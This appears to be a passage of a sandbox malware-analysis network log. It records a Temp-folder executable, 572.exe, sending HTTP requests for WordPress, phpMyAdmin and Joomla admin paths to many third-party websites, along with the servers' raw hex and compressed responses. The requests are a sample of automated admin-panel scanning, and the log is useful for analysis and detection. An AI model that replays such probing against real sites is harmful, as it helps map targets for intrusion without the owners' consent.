                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                251192.168.2.65637513.248.169.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.111229897 CET180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.254216909 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834cc-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_OKB7WrBtq7gd7F0ms7RAcd/snarZhs4nur5ULU0/whmtIca/yk9ak7iZzxE7w3HJMbMx6BASOtNCTzxf6I8+tg
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.287332058 CET382OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=81.181.57.74; _policy={"restricted_market":false,"tracking_market":"none"}; country=RO; city=""
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://secure.vexcorp.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.408469915 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834cc-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UvizrpI/g1QfpV6I+4Dwye5JZlidZbmD9MDxlqh1ZX2psdWsek8Ct502wrjgKXNE/PcJ20t+C5OrclrMPaWatg
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                252192.168.2.65639223.4.32.21680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.115837097 CET179OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.237099886 CET185INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                253192.168.2.65640496.7.224.17880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.118060112 CET176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.239166021 CET635INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 279
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131692179_1611129006_213760295_11_8707_0_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 77 70 26 23 34 35 3b 6c 6f 67 69 6e 26 23 34 36 3b 70 68 70 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 36 39 32 26 23 34 36 3b 63 62 64 62 39 32 37 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;wp&#45;login&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131692&#46;cbdb927</BODY></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                254192.168.2.656106185.120.71.2680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.154366016 CET180OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.364083052 CET385INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.analvids.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                255192.168.2.656181104.21.14.24580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.265022993 CET176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.396264076 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BhAGiaxVKVO%2FWM0P0dvf67Exyiv0%2Fsc%2BreFc2Rw9417O5wwrVWr8h6F%2BHuGVGAQcOTJjqUvh5ZtWLvjvOgY5xv0QnK6GitDB5vUDB9Rsq%2F1TqxsFxyoYFxbBHnBV3vVVdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb74fa3c12d3-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c 29 de 97 26 71 64 15 d7 dd 14 08 b0 c5 6d 6f b3 68 17 87 45 40 91 23 8b 17 8a d4 91 94 15 23 cd 7f 2f 28 4a b6 fc 92 5c 17 2d 10 20 a2 38 7c 66 e6 e1 33 23 d2 c9 c9 c7 9f 3f dc 7d fb 7c 03 85 2d 45 3a 4a 4e c2 f0 57 9e 83 b0 70 7b 03 17 df 53 48 dc 04 50 41 8c 59 04 52 85 bf 19 e0 f8 67 50 82 71 0c 40 10 b9 5c 04 28 c3 af 5f 82 14 92 93 5f 51 32 9e 7f 0f c3 2d 54 87 03 70 1c ea e2 c7 a0 2e 5f 81 ba fc 01 a8 a5 ed d0 dc 8b 63 59 1e a2 84 e1 2e 52 81 84 a5 a3 c4 72 2b 30 fd c9 5a 94 96 2b 09 bf e0 ef 35 d7 c8 4e e0 df f0 41 a8 9a e5 82 68 4c 62 6f 37 4a 4a b4 04 68 41 b4 41 bb 08 be de fd 2d bc 0c 20 ee 27 0a 6b ab d0 21 ac 16 c1 07 25 1d 68 78 b7 ae 30 00 ea 47 8b c0 e2 a3 8d 5d bc d7 1b 98 d7 50 fe 15 7e fd 29 fc a0 ca 8a 58 9e 89 21 d0 ed cd e2 86 2d 71 b0 4e 92 12 17 81 56 99 b2 66 60 28 15 97 0c 1f a7 20 55 ae 84 50 cd c1 92 15 c7 a6 52 da 0e 16 35 9c d9 62 c1 70 c5 29 86 ed 60 ca 25 b7 9c 88 d0 50 22 70 31 f3 28 82 cb 07 d0 28 16 81 b1 6b 81 a6 40 b4 01 70 b6 08 68 7e ef 5f 85 d4 98 00 0a 8d f9 22 88 29 93 21 5d f2 d8 4f c5 34 8f 50 6b a5 4d d4 1a c5 fb 1a be fa 9e be ec e2 6c eb 82 a3 f3 72 f6 87 5e 38 f6 8e 76 d5 d0 1a a6 99 62 eb a7 92 e8 25 97 f3 f3 eb 8a 30 c6 e5 72 7e fe 9c 78 a0 74 34 1a 28 10 5d 7c b3 f3 4e 83 a3 c4 50 cd 2b 9b 8e 00 78 0e e3 13 49 56 7c 49 ac d2 11 55 ea 81 e3 8d 24 99 40 36 81 a7 91 2b 81 86 4b a6 9a 88 30 76 b3 42 69 3f 71 63 51 a2 1e 9f 7d fc f9 ef 9d 72 3e 29 c2 90 9d 4d 21 af 25 6d c5 39 ee 57 03 ac 88 86 0e 58 c0 02 98 a2 75 89 d2 46 4b b4 37 02 dd e3 5f d7 b7 6c 7c e6 6d 42 22 50
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c8Xmo_1Q,)&qdmohE@##/(J\- 8|f3#?}|-E:JNWp{SHPAYRgPq@\(__Q2-Tp._cY.Rr+0Z+5NAhLbo7JJhAA- 'k!%hx0G]P~)X!-qNVf`( UPR5bp)`%P"p1((k@ph~_")!]O4PkMlr^8vb%0r~xt4(]|NP+xIV|IU$@6+K0vBi?qcQ}r>)M!%m9WXuFK7_l|mB"P
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.396281958 CET1198INData Raw: db b3 c9 75 b7 ba 5f 19 b5 79 45 8c 9b 4a 90 35 2c e0 2c 13 8a 3e 9c 79 bb e7 c9 08 e0 79 94 c4 7d 6a 07 55 34 1a 25 71 57 48 8e 3b 97 7c c2 f8 aa db ff b0 d1 a4 aa 50 07 69 0b d7 ce 74 45 4a 73 1f 12 f4 0f 61 bb 41 6e d8 45 dc 8e 3b 25 0d 72 08
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: u_yEJ5,,>yy}jU4%qWH;|PitEJsaAnE;%rKB4Xt%F&H?$25Q3EzZMt;{M#jW^hiw_)UY!dZ#dI\ho:$"UP7U~? :'WWWWUeo6$:M@
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.396298885 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.397514105 CET218OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ag.ufa9999.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.520472050 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rnHUskwPaTak3RTPHyRhhoWMf8E7rS6yw0kRm6829YQyRTYm9KQeQ1tmAj%2BNlN9t9rc0GLcTTzHs%2F%2BxjvvnYDNXPDSEbDAA1WvXswTBApw3%2FfZRwtHcUvinf6%2BszZf5QVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb75da9112d3-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c 29 de 97 26 71 64 15 d7 dd 14 08 b0 c5 6d 6f b3 68 17 87 45 40 91 23 8b 17 8a d4 91 94 15 23 cd 7f 2f 28 4a b6 fc 92 5c 17 2d 10 20 a2 38 7c 66 e6 e1 33 23 d2 c9 c9 c7 9f 3f dc 7d fb 7c 03 85 2d 45 3a 4a 4e c2 f0 57 9e 83 b0 70 7b 03 17 df 53 48 dc 04 50 41 8c 59 04 52 85 bf 19 e0 f8 67 50 82 71 0c 40 10 b9 5c 04 28 c3 af 5f 82 14 92 93 5f 51 32 9e 7f 0f c3 2d 54 87 03 70 1c ea e2 c7 a0 2e 5f 81 ba fc 01 a8 a5 ed d0 dc 8b 63 59 1e a2 84 e1 2e 52 81 84 a5 a3 c4 72 2b 30 fd c9 5a 94 96 2b 09 bf e0 ef 35 d7 c8 4e e0 df f0 41 a8 9a e5 82 68 4c 62 6f 37 4a 4a b4 04 68 41 b4 41 bb 08 be de fd 2d bc 0c 20 ee 27 0a 6b ab d0 21 ac 16 c1 07 25 1d 68 78 b7 ae 30 00 ea 47 8b c0 e2 a3 8d 5d bc d7 1b 98 d7 50 fe 15 7e fd 29 fc a0 ca 8a 58 9e 89 21 d0 ed cd e2 86 2d 71 b0 4e 92 12 17 81 56 99 b2 66 60 28 15 97 0c 1f a7 20 55 ae 84 50 cd c1 92 15 c7 a6 52 da 0e 16 35 9c d9 62 c1 70 c5 29 86 ed 60 ca 25 b7 9c 88 d0 50 22 70 31 f3 28 82 cb 07 d0 28 16 81 b1 6b 81 a6 40 b4 01 70 b6 08 68 7e ef 5f 85 d4 98 00 0a 8d f9 22 88 29 93 21 5d f2 d8 4f c5 34 8f 50 6b a5 4d d4 1a c5 fb 1a be fa 9e be ec e2 6c eb 82 a3 f3 72 f6 87 5e 38 f6 8e 76 d5 d0 1a a6 99 62 eb a7 92 e8 25 97 f3 f3 eb 8a 30 c6 e5 72 7e fe 9c 78 a0 74 34 1a 28 10 5d 7c b3 f3 4e 83 a3 c4 50 cd 2b 9b 8e 00 78 0e e3 13 49 56 7c 49 ac d2 11 55 ea 81 e3 8d 24 99 40 36 81 a7 91 2b 81 86 4b a6 9a 88 30 76 b3 42 69 3f 71 63 51 a2 1e 9f 7d fc f9 ef 9d 72 3e 29 c2 90 9d 4d 21 af 25 6d c5 39 ee 57 03 ac 88 86 0e 58 c0 02 98 a2 75 89 d2 46 4b b4 37 02 dd e3 5f d7 b7 6c 7c e6 6d 42 22 50 db b3
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c8Xmo_1Q,)&qdmohE@##/(J\- 8|f3#?}|-E:JNWp{SHPAYRgPq@\(__Q2-Tp._cY.Rr+0Z+5NAhLbo7JJhAA- 'k!%hx0G]P~)X!-qNVf`( UPR5bp)`%P"p1((k@ph~_")!]O4PkMlr^8vb%0r~xt4(]|NP+xIV|IU$@6+K0vBi?qcQ}r>)M!%m9WXuFK7_l|mB"P
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.520489931 CET1196INData Raw: c9 75 b7 ba 5f 19 b5 79 45 8c 9b 4a 90 35 2c e0 2c 13 8a 3e 9c 79 bb e7 c9 08 e0 79 94 c4 7d 6a 07 55 34 1a 25 71 57 48 8e 3b 97 7c c2 f8 aa db ff b0 d1 a4 aa 50 07 69 0b d7 ce 74 45 4a 73 1f 12 f4 0f 61 bb 41 6e d8 45 dc 8e 3b 25 0d 72 08 80 11
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: u_yEJ5,,>yy}jU4%qWH;|PitEJsaAnE;%rKB4Xt%F&H?$25Q3EzZMt;{M#jW^hiw_)UY!dZ#dI\ho:$"UP7U~? :'WWWWUeo6$:M@u
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.520503998 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                256192.168.2.65642854.183.63.24180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.356218100 CET180OUTGET /wp-login.php HTTP/1.1
